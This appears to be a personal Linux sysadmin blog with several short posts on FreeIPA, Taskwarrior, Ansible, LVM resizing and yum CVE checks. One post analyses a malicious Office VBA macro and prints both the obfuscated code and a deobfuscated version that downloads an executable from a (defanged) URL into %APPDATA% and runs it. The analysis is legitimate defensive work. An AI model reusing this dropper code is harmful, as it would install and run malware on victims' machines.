If you are trying to create an HBAC rule in FreeIPA to allow users to log on to Fedora 27 workstations via GDM, you will need to do the following:
– Create a new HBAC service in FreeIPA, called “systemd-user”
– Create an HBAC rule that includes “gdm”, “gdm-password”, and “systemd-user”, granting access to your users for the targeted hosts
Figuring out the need to create the “systemd-user” service required adding “debug_level=9” in the [pam] section of /etc/sssd/sssd.conf, and a lot of patience.
I have tried many task management solutions over time, and for the first time have found something that doesn’t annoy me after a month. For almost a year now, I’ve been using Taskwarrior and Inthe.Am quite successfully to manage both my work tasks and my personal tasks.
My requirements are seemingly simple:
I also had a couple wish list items:
Many many years ago, I used the incredibly awesome Hiveminder. Sadly, the service has been shut down, and I have no interest in taking on maintenance of the code. But Hiveminder met all of my requirements and my wish list, and truly was a great piece of software (ok, I would have preferred something other than the yellow theme, but that’s a minor nit).
The ability to associate task dependencies has always been a big requirement for me, and has been the feature most lacking from the tools I’ve tried. I like to be able to create rich graphs of dependencies, and then have the tool give me a report of only those tasks that have no pending dependencies; i.e., those that are actually actionable now. For example, I may have the following three tasks:
Tasks #1 and #2 are both dependent on task #3, meaning I can’t act on #1 and #2 until #3 is completed. So, when I glance at my task list, I don’t want to see it cluttered with tasks I can’t act on; it should hide #1 and #2.
Although it has a learning curve, Taskwarrior provides all of this in spades.
Taskwarrior is Free and Open Source Software that manages your TODO list from the command line. It is flexible, fast, and unobtrusive. It does its job then gets out of your way.
Tasks are easily managed directly from my Linux command line:
task add Trim the hedges due:2017-08-01 project:lawn depend:3
This was awesome, as I’m a command line junky, but made it hard to have my tasks with me via my mobile device. But then I stumbled on Inthe.Am, a cloud service (and open source software) to sync my tasks and provide a WebUI. As a bonus, Inthe.Am also provides integration with Trello and email, and provides an iCal feed that I can use to show tasks on my Google Calendar.
Taskwarrior + Inthe.Am have met all of my requirements. The only thing missing is my wish for multi-user task management — but I’ve come to accept that just because I may like this product, others may not like me imposing this toolset upon them. But still – unless someone rewrites Hiveminder in Python, Go, Rust, or Node.js and decides to offer it as a Tasks-aaS, Taskwarrior and Inthe.Am are going to be helping me manage my tasks for the forseeable future.
For many, the discussion is not “should I use the public cloud?”; rather it is “how and when do I leverage the public cloud?”. This is not a boolean decision, there is no need to turn off your existing data center simply because you have decided to adopt the public cloud. Hybrid Cloud and Multi Cloud strategies are increasingly common — identify your subset of workloads that you consider reasonable for public cloud, determine if moving to a public cloud will provide cost benefits (e.g., periodic or “bursty” workloads), and expand your operation to the public cloud for just those workloads.
Generally, there are three concerns to be addressed in selecting workloads: cost, performance, and security/compliance.
Cost and performance requirements are fairly quantitative, and relatively easy to analyze.
But there is a real challenge in maintaining a consistent security and compliance posture across this expanded infrastructure. Whether moving 1 or 2 workloads to the public cloud or 90% of your infrastructure, the ability to maintain security patches, apply consistent access control, generate compliance reports, and detect and apply configuration changes is critical.
We have a great set of sessions lined up in our Security Track at Red Hat Summit this year, addressing these concerns and more. “Compliance, security automation, and remediation with Red Hat CloudForms, Red Hat Satellite, and Ansible Tower by Red Hat” will provide guidance on maintaining a consistent compliance posture across private and public cloud, “Identity management for cloud and hybrid cloud environments with Red Hat and Microsoft” will discuss maintaining uniform identity between Azure Active Directory Domain Services and your Red Hat Enterprise Linux systems, and “Middleware security: Authentication, authorization, and auditing services” will introduce our new Single Sign-On solution based on Keycloak for Federated Authorization across your applications, regardless of where they are hosted.
I will be blogging and tweeting (@rhmjs) all through Summit. And if you are joining us in San Francisco, please make sure to come find me at the Red Hat Booth! Hope to see you there!
So … this happened today:
Matt Smith – Chief Architect, Northeast Commercial
Matt will be taking on the role of Chief Architect for the Northeast team under Sean Spurrier. He has been at Red Hat for 3 years in an Account SA role most recently covering some of our larger Financial Services customers along with being the IDM SME team lead and resident security guru. He has had a great impact on the emerging technology and consulting business of the Northeast and last year won a Chairman’s award as well. He joined us from the University of Connecticut and lives with his wife, 4 children and log chopping machine in the hinterlands of Eastern Connecticut.
I gotta admit — I’ve never been more humbled. Red Hat is an incredible organization, with incredible people and incredible goals. To be able to make an impact in such an organization is truly rewarding, and to be recognized with such an opportunity is awesome.
Can you tell I enjoy working here?
Maybe you should too: http://jobs.redhat.com/
Somehow, I became a proud new owner of a piece of (somewhat) malicious code tonight. Once making sure it was properly neutered, and after running it through VirusTotal and being surprised by how few (9/55) engines were detecting it, I decided to take a look.
Sub HCYh58Llju(ByRef iKvmUvcYr3wp, ByVal Q3REKGitD, ByVal kwoeg8c)
iKvmUvcYr3wp = Split(Q3REKGitD, kwoeg8c)
End Sub
Sub S1HL1_C(ByVal LL3FDJzJgC, ByVal cOdzspoHpj)
On Error Resume Next
xDyHfiQQsRQ8 = cOdzspoHpj.responseBody
LL3FDJzJgC.Write xDyHfiQQsRQ8
End Sub
Sub AutoOpen()
On Error Resume Next
Dim HUiu827TYRH
HUiu827TYRH = StrReverse(StrReverse(StrReverse("m" & "d" & " " & "/")))
Const KMKM = "km "
Const CCCC = " c"
Dim q7bPJ655QjSG
HCYh58Llju q7bPJ655QjSG, StrReverse("|exe.tsohnvsetadpUdnW%ATADPPA%|exe.605ild/stsop/moc.34oledsmanilad//:ptth|maertS.BDODA|PTTHLMX.tfosorciM|llehS"), "|"
Dim nPtKNIjU35IQ
Set nPtKNIjU35IQ = CreateObject("W" & StrReverse("tpircS") & "." & StrReverse("llehS"))
C4KAAHcn = nPtKNIjU35IQ.ExpandEnvironmentStrings(q7bPJ655QjSG(4))
jnF1QSEGIA = Split(C4KAAHcn, "")
R9Z8D2tPkYNy = UBound(jnF1QSEGIA)
nPtKNIjU35IQ.Run "c" & StrReverse(KMKM & CCCC & HUiu827TYRH) & StrReverse("rid") & " """ & Mid(C4KAAHcn, 1, Len(C4KAAHcn) - Len(jnF1QSEGIA(R9Z8D2tPkYNy))) & """", 0, True
Set v8t0w6fxasM = CreateObject(q7bPJ655QjSG(1))
v8t0w6fxasM.Open Chr$(71) + Chr$(69) + Chr$(84), q7bPJ655QjSG(3), False
v8t0w6fxasM.setRequestHeader "Cache-Control", "no-cache, no-store"
Set n7nUrIZKvU2A = CreateObject(q7bPJ655QjSG(2))
n7nUrIZKvU2A.Open
v8t0w6fxasM.send
n7nUrIZKvU2A.Type = 1
Application.Run "S1HL1_C", n7nUrIZKvU2A, v8t0w6fxasM
Application.Run "h2xPVFcahn", n7nUrIZKvU2A, C4KAAHcn
n7nUrIZKvU2A.Close
nPtKNIjU35IQ.Run "c" & StrReverse(""" """" trats" & " c" & HUiu827TYRH) & C4KAAHcn & """", 0, False
End Sub
Function h2xPVFcahn(ByVal n7nUrIZKvU2ATMP, ByVal C4KAAHcnTMP)
n7nUrIZKvU2ATMP.SaveToFile C4KAAHcnTMP, 2
End Function
Sub Workbook_Open()
On Error Resume Next
AutoOpen
End Sub
Oh noes .. it’s teh crypted!!! No, of course not. Someone just thought they’d be funny and obfuscate this to make it a bit tougher to figure out what they’ve done. Because, you know, StrReverse(StrReverse(StrReverse(…))) is 3 times better than a single StrReverse!!
So anyway, sarcasm aside (yeah, right), this is nothing more difficult than the cryptoquote in your Sundary newspaper or the (really great!) puzzles at the end of every Gravity Falls episode.
So let’s get out the text editor and start doing some simple search and replace.
First — let’s remove all the silly StrReverse functions. It’s pretty easy to pick out the most interesting, and reverse it from the CLI:
Please mentally ignore all occurrences of “<DONT_GO_HERE>” — I just injected them because I didn’t trust this blog to not automagically make those URLs clickable.
$ echo "|exe.tsohnvsetadpUdnW%ATADPPA%|exe.605ild/stsop/moc.34oledsmanilad//:ptth|maertS.BDODA|PTTHLMX.tfosorciM|llehS" | rev Shell|Microsoft.XMLHTTP|ADODB.Stream|http://dalinam<DONT_GO_HERE>sdelo43.<DONT_GO_HERE>com/posts/dli506.exe|%APPDATA%WndUpdatesvnhost.exe|
Of course, this now makes it pretty obvious that the subroutine named “HCYh58Llju” is just taking a string delimited by “|” and splitting it up into an array — so do a quick “s/HCYh58Llju/splitter_func/” on the file, just to make it easier to read.
The rest of the steps are pretty easy to follow — just keep finding easy string concatenation or reversal, and do a search and replace on obfuscated names once you figure out what they do. Here is the final result of my analysis:
//Sub splitter_func(ByRef splitted, ByVal urlstr, ByVal seperator) // splitted = Split(urlstr, seperator) //End Sub
Sub write_xmlhttp_response_to_stream_func(ByVal LL3FDJzJgC, ByVal xmlhttp_objTMP) On Error Resume Next xml_responsebody_obj = xmlhttp_objTMP.responseBody adodb_objTMP.Write xml_responsebody_obj End Sub
Sub AutoOpen() On Error Resume Next Dim HUiu827TYRH HUiu827TYRH = "/ dm" Const KMKM = "km " Const CCCC = " c"
Dim splitted_data // splitter_func splitted_data, "Shell|Microsoft.XMLHTTP|ADODB.Stream|http://dal<DONT_GO_HERE>inamsdelo43.co<DONT_GO_HERE>m/posts/dli506.exe|%APPDATA%WndUpdatesvnhost.exe|", "|"
splitted_data=("Shell","Microsoft.XMLHTTP","ADODB.Stream","http://da<DONT_GO_HERE>linamsd<DONT_GO_HERE>elo43.c<DONT_GO_HERE>om/posts/dli506.exe","%APPDATA%WndUpdatesvnhost.exe")
Dim wscript_shell_obj
Set wscript_shell_obj = CreateObject("WScript.Shell")
wndupd_location_str = wscript_shell_obj.ExpandEnvironmentStrings("%APPDATA%WndUpdatesvnhost.exe")
wndupd_location_parts = Split(wndupd_location_str, "") highest_index_of_wndupd_loc_parts = UBound(wndupd_location_parts)
#MJS Make a directory in APPDATA wscript_shell_obj.Run "cmd /cmkdir "%APPDATA%WndUpdate""", 0, True
Set xmlhttp_obj = CreateObject("Microsoft.XMLHTTP")
xmlhttp_obj.Open "GET", "http://dal<DONT_GO_HERE>inamsdelo<DONT_GO_HERE>43.c<DONT_GO_HERE>om/posts/dli506.exe", False
xmlhttp_obj.setRequestHeader "Cache-Control", "no-cache, no-store"
Set adodb_obj = CreateObject("ADODB.Stream")
adodb_obj.Open
xmlhttp_obj.send
adodb_obj.Type = 1
Application.Run "write_xmlhttp_response_to_stream_func", adodb_obj, xmlhttp_obj
Application.Run "save_stream_to_file_func", adodb_obj, wndupd_location_str
adodb_obj.Close
wscript_shell_obj.Run "cmd /cstart "%APPDATA%WndUpdatesvnhost.exe""", 0, False
End Sub
Function save_stream_to_file_func(ByVal adodb_objTMP, ByVal wndupd_location_strTMP) adodb_objTMP.SaveToFile wndupd_location_strTMP, 2 End Function
Sub Workbook_Open() On Error Resume Next AutoOpen End Sub
This was a stupid exercise. All this script does is create a directory in %APPDATA%, downloads a file from a random site, names is svnhost.exe locally, and then executes that file. Pretty straightforward stage 1 payload. The real fun, of course, is in analyzing stage 2. But I’ll leave that for the pros ….
I want to use some of the new extras modules (especially virt_net and virt_pool), so here are my notes on building the Ansible 2.0 RPM for Fedora 23.
sudo dnf install asciidoc rpm-build python-devel git clone git://github.com/ansible/ansible.git --recursive cd ansible/ make rpm sudo dnf -y install ./rpm-build/ansible-2.*.noarch.rpm ansible --version
One note — it is possible I already installed some packages necessary for building Ansible, and so the list of packages I installed may not be sufficient. If you stumble across any, please let me know and I will update this post.
I just installed Fedora 23 on a new laptop, happily clicking my way through the GUI installer. The installer very nicely partitioned my disks to a small boot partition, and a larger LUKS-encrypted volune, and created an LVM PV from that LUKS-encrypted volume, then carved out several LVs for /, /home, etc. Everything is up and running within 15 minutes, and I’ve started copying over my files from my old laptop.
Then … I decide to create a new LV to hold my VM images, and suddenly realize I forgot to tell the installer to use all available storage for my PV! I see this:
fdisk -l Disk /dev/sda: 238.5 GiB, 256060514304 bytes, 500118192 sectors ... Device Boot Start End Sectors Size Id Type /dev/sda1 * 2048 1026047 1024000 500M 83 Linux /dev/sda2 1026048 226492415 225466368 107.5G 83 Linux
I have around 120GB of space where I could create a new PV … but I really want a single PV of 238 GiB. And heck, this is a new laptop install, worst case is everything blows up and I lose an hour.
Fixing this was surprisingly easy!
# fdisk /dev/sda
Welcome to fdisk (util-linux 2.27.1).
...
Command (m for help): p
Disk /dev/sda: 238.5 GiB, 256060514304 bytes, 500118192 sectors
...
/dev/sda1 * 2048 1026047 1024000 500M 83 Linux
/dev/sda2 1026048 226492415 225466368 107.5G 83 Linux
Command (m for help): d
Partition number (1,2, default 2): 2
Partition 2 has been deleted.
Command (m for help): n
Partition type
p primary (1 primary, 0 extended, 3 free)
e extended (container for logical partitions)
Select (default p): p
Partition number (2-4, default 2):
First sector (1026048-500118191, default 1026048):
Last sector, +sectors or +size{K,M,G,T,P} (1026048-500118191, default 500118191):
Created a new partition 2 of type 'Linux' and of size 238 GiB.
Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.
# partprobe -s
/dev/sda: msdos partitions 1 2
# cryptsetup resize luks-a522aeb6-2526-4868-82ba-c36b01dc5d53
# pvscan PV /dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53 VG fedora lvm2 [107.51 GiB / 8.00 MiB free] Total: 1 [107.51 GiB] / in use: 1 [107.51 GiB] / in no VG: 0 [0 ] # pvresize /dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53 Physical volume "/dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53" changed 1 physical volume(s) resized / 0 physical volume(s) not resized # pvscan PV /dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53 VG fedora lvm2 [237.98 GiB / 130.48 GiB free] Total: 1 [237.98 GiB] / in use: 1 [237.98 GiB] / in no VG: 0 [0 ]
And that’s it! I now have a VG composed of a single PV occupying the entire drive!
Let’s say we are looking to determine if our system is vulnerable to Heartbleed or LogJam.
# ls /usr/lib64/libssl.so.* /usr/lib64/libssl.so.10 /usr/lib64/libssl.so.1.0.1e
# yum info openssl
Installed Packages Name : openssl Arch : x86_64 Epoch : 1 Version : 1.0.1e Release : 42.el7_1.9 Size : 1.5 M Repo : installed From repo : rhel-7-server-rpms Summary : Utilities from the general purpose cryptography library with TLS implementation URL : http://www.openssl.org/ License : OpenSSL Description : The OpenSSL toolkit provides support for secure communications between : machines. OpenSSL includes a certificate management tool and shared : libraries which provide various cryptographic algorithms and : protocols.
Note “Version” is 1.0.1e. But that denotes what version Red Hat based the relesae. Since that release, Red Hat has backported many future bugfixes, security fixes, etc, exposed by the “Release” value 42.el7_1.9.
https://access.redhat.com/security/updates/backporting/
Using Heartbleed (CVE-2014-0160) as the example (https://access.redhat.com/solutions/781793)
“Red Hat Enterprise Linux 7 include OpenSSL version openssl-1.0.1e-34.el7 which includes a fix backported from openssl-1.0.1g”
Each specific CVE can be check directly on Red Hat’s site, https://access.redhat.com/security/cve/CVE-2014-0160
You can also check directly on the command line. For example, checking for Heartbleed you would use:
# yum updateinfo list installed --cve CVE-2014-0160
This will show any RPM packages installed that apply to Heartbleed. But note — nothing will return on a RHEL7 system, because the original RPM released with RHEL7 was not vulnerable, so no additiona package needed to be installed to fix it.
Logjam, though, is a little more interesting.
# yum updateinfo list installed --cve CVE-2015-4000
RHSA-2015:1229 Critical/Sec. java-1.7.0-openjdk-1:1.7.0.85-2.6.1.2.el7_1.x86_64 RHSA-2015:1229 Critical/Sec. java-1.7.0-openjdk-1:1.7.0.85-2.6.1.3.el6_6.x86_64 RHSA-2015:1229 Critical/Sec. java-1.7.0-openjdk-headless-1:1.7.0.85-2.6.1.2.el7_1.x86_64 RHSA-2015:1185 Moderate/Sec. nss-3.19.1-3.el6_6.x86_64 RHSA-2015:1185 Moderate/Sec. nss-3.19.1-3.el7_1.x86_64 RHSA-2015:1185 Moderate/Sec. nss-sysinit-3.19.1-3.el6_6.x86_64 RHSA-2015:1185 Moderate/Sec. nss-sysinit-3.19.1-3.el7_1.x86_64 RHSA-2015:1185 Moderate/Sec. nss-tools-3.19.1-3.el6_6.x86_64 RHSA-2015:1185 Moderate/Sec. nss-tools-3.19.1-3.el7_1.x86_64 RHSA-2015:1185 Moderate/Sec. nss-util-3.19.1-1.el6_6.x86_64 RHSA-2015:1185 Moderate/Sec. nss-util-3.19.1-1.el7_1.x86_64 RHSA-2015:1072 Moderate/Sec. openssl-1.0.1e-30.el6_6.9.x86_64 RHSA-2015:1072 Moderate/Sec. openssl-1:1.0.1e-42.el7_1.6.x86_64 RHSA-2015:1072 Moderate/Sec. openssl-libs-1:1.0.1e-42.el7_1.6.x86_64
Each of those RHSA’s addressed Logjam. You can get a lot more information by using:
# yum updateinfo info installed --cve CVE-2015-4000
Note the use of “installed” in these commands. This shows information only about packages that are already installed. If you remove “installed”, you will see information only about packages that /could/ be installed.
I spend most of my day in front of Google Chrome, Mozilla Thunderbird, and Gnome Terminal on my RHEL 7 desktop running Gnome Shell. Chrome’s ability to hide the system titlebar creates a pretty slick and efficient desktop, so I’ve been craving the same for Thunderbird. Luck (and a little bit of Google-fu) just brought me to the Pixel Saver Gnome Shell extension. Works like a champ, thank you @deadalnix !
Adding to my collection of BSOD’s I’ve seen while traveling, I saw this one at Heathrow Airport earlier today.
I find it strangely interesting that the 90° rotation isn’t maintained by the BSOD …